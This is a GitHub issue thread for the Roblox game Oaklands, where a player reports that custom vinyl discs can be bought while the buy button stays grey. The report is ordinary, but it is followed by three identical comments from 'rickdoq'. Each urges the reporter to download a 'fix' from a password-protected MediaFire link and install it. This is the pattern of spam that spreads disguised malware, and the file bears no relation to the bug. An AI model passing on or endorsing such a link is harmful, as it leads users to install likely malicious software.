### ISSUE TITLE
[BUG]: You can still buy custom vinyls when the buy button is greyed out

### ISSUE THREAD

**Issue by Henry4799** [typical-developers/oaklands-feedback#901]
### Roblox Username

godlybossman234

### What version did this issue occur in?

1.66.0

### Describe the issue in detail.

Typically the buy button would turn green and let you buy the disc but with certain codes it'll stay gray and let you buy a disc that doesnt play anything.

### Provide some images / videos of the issue in action.

https://github.com/user-attachments/assets/02ec38ca-23d3-4294-aae5-e37d916276f1

### Before Submitting

- [X] I have confirmed that nobody else reported this issue.
- [X] The details of this report are legitimate.
- [X] I understand that I cannot be reimbursed here for in-game content I have lost.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
